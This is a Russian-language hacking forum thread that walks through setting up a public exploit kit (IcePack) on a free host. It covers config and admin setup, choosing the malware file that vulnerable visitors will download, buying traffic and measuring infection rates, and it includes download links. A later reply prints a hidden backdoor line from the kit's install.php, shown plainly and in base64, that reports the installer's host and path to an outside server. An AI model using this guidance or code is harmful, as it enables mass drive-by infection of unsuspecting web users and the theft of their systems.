ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Настраиваем связку эксплоитов (https://forum.antichat.xyz/showthread.php?t=8032501)

Duplet 28.05.2010 01:00

IMAGE http://www.freelancejob.ru/upload/365/18460872676223.png

Обобщение

Спойлер
Эксплойт, эксплоит (англ. exploit, эксплуатировать) — это компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему. Целью атаки может быть как захват контроля над системой (повышение привилегий), так и нарушение её функционирования (DDoS-атака).

================================================== ================================================== =
А для чего же это надо?

Спойлер
Троян с сайта-наверное вы мои друзья слышали что ужастные хакеры грузят троян на сайт и с сайта рассылаю вирус!Но это они дулают через связку эксплоидов,у которых пробив под 50-70%,они естественно приватные и продаются очень дорого,а мы используем паблик,и пробив у него 10-30% это значит что из 1000 человек,которые зашли на сайт вирус скачают только 100-300 человек

Настраиваем связку
================================================== ==================================================
Итак для начала мы должны скачать саму связку по ссылке:

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Скачали?Отлично теперь распаковываем все и заливаем к себе на сайт ,я вам советую хостинг под это дело phpnet.us отлично держится,у меня пока ни 1 сайт не закрыли,администрации ваобще ПО что вы там делаети...

Так уже почти всё,теперь ставим на все файлы права 777.После нам надо создать базу данных,мы идём ,создаём базу данных,как создали идём обратно и редактируем файл db:
IMAGE http://i020.radikal.ru/1005/6c/461cd3e0caca.gif

Я думаю как редактировать всем понятно?Если нет напишите в этой теме объясню как буду в сети.
Теперь нам надо выбрать логин и пароль для админки эксплоида,для этого идём в файл config и редактируем:

PHP highlight

Код:


       
Код:

       
"http://XAKEP.1gb.com/",-адрес вашего сайт,там будет вредностный скрипт

'admin_name'=>"",-логин к вашей админке

'admin_pass'=>"",-пароль к админке

);

?>




всё сохраняем и идём на ссылку :
адрес вашего сайта/install.php и сохраняем все настройки)))
Все теперь мы заходим в админку по ссылке :ваш_сайт/admin/index.php? вводите логин и пароль и мы идём настраивать эксплоит.
Теперь мы идём в инструменты-настройка

Видим стройку "файл для загрузки",этот файл эксплоид будет грузить врагу если браузер уязвим,и если ваш враг зайдёт по ссылке ваш_сайт.phpnet.us...Теперь мы идём к торговцу и заказываем трафик и проверяем пробивную силу вашей связки эксплоитов:
================================================== ================================================== =
К примеру если 1000 трафика,ваша связка пробила 500,то пробивная сила 50%,но таких связок очень мало и стоят они очень дорого...

по 900-2000$,это не шутка.Всё я закончил...

:dj:
================================================== ================================================== =
Duplet
http://black-energy.ru/

M@ZAX@KEP 28.05.2010 01:00

Неплохо было бы дополнить, что за связку ты выложил, какие браузеры пробивает?

Duplet 28.05.2010 01:00

IcePack сори забыл указать...
У кого еще есть связки если хотите выкладывайте в этой теме...

FrostArtes 29.08.2010 01:00

Кто может перезалить ?

iGloomy 29.08.2010 01:00

Вот перезалил, этот icepack скачивал с этой темы.

FrostArtes 29.08.2010 01:00

WTF

code:

FrostArtes, вы не имеете прав для доступа к этой странице. Это может быть вызвано несколькими причинами:
Ваш аккаунт имеет недостаточно прав для доступа к этой странице. Вы пытаетесь редактировать чьё-то сообщение, использовать административные полномочия или прочие опции ограниченного доступа?
Вы пытаетесь написать сообщение, но ваш аккаунт отключён администрацией или ожидает активации.

Если ваш аккаунт ожидает активации, вам необходимо подождать некоторое время (обычно аккаунты активируются в течение 24 часов). Когда ваш аккаунт будет активирован, на ваш почтовый ящик придет уведомление.

Причем не 1 раз такое уже !

Залей на slil.ru пожалуйста

iGloomy 29.08.2010 01:00

Цитата:

Сообщение от FrostArtes

WTF

незнаю, ща тогда куданить перезалью.

Добавлено через 1 минуту
http://slil.ru/29613197

FrostArtes 29.08.2010 01:00

Эх жаль,но файл никак не грузится с сайта ))

iGloomy 29.08.2010 01:00

со слил не грузиться?

MOV_EAX 04.02.2011 01:00

а что толку его качать тем кто не знает что внутри происходит

вот эти строки наверно указывают на перегон трафика самому хозяину связки.


file_get_contents('http://datings.1gb.in/c.php?host=' . $_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);


а в зашифрованном виде это так ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kYXRpbmdzLjFnYi 5pbi9jLnBocD9ob3N0PScgLiAkX1NFUlZFUlsnSFRUUF9IT1NU J10gLiAnJnJvb3Q9JyAuICRfU0VSVkVSWydTQ1JJUFRfRklMRU 5BTUUnXSk7IA==
в файле install.php

предлагаю вместе обсудить как теперь создать новую таблицу базы чтоб она заработала ведь она раньше работала на хозяина связки

download

а скачать можно отсюда


Время: 17:32